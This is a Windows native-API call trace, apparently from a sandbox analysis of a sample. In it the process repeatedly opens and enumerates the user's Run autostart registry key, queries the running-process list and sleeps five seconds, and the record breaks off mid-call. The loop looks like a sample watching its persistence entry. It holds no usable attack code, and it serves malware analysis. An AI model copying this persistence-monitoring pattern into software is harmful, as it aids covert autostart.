[0178.145] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.147] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.147] NtClose (Handle=0x274) returned 0x0 [0178.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.158] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.162] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.163] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.163] NtClose (Handle=0x274) returned 0x0 [0178.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.190] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.191] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.191] NtClose (Handle=0x274) returned 0x0 [0178.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.204] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.207] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.209] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.209] NtClose (Handle=0x274) returned 0x0 [0178.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.221] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.224] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.225] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.225] NtClose (Handle=0x274) returned 0x0 [0178.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.237] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.240] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.243] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.243] NtClose (Handle=0x274) returned 0x0 [0178.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.255] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.258] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.259] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.260] NtClose (Handle=0x274) returned 0x0 [0178.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.270] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.276] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.278] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.278] NtClose (Handle=0x274) returned 0x0 [0178.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.292] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.295] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.295] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.295] NtClose (Handle=0x274) returned 0x0 [0178.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.307] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.337] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.339] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.339] NtClose (Handle=0x274) returned 0x0 [0178.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.381] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.386] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.387] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.387] NtClose (Handle=0x274) returned 0x0 [0178.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.398] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.416] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.425] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.426] NtClose (Handle=0x274) returned 0x0 [0178.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.495] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.525] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.527] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.527] NtClose (Handle=0x274) returned 0x0 [0178.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.537] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.551] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.553] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.553] NtClose (Handle=0x274) returned 0x0 [0178.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 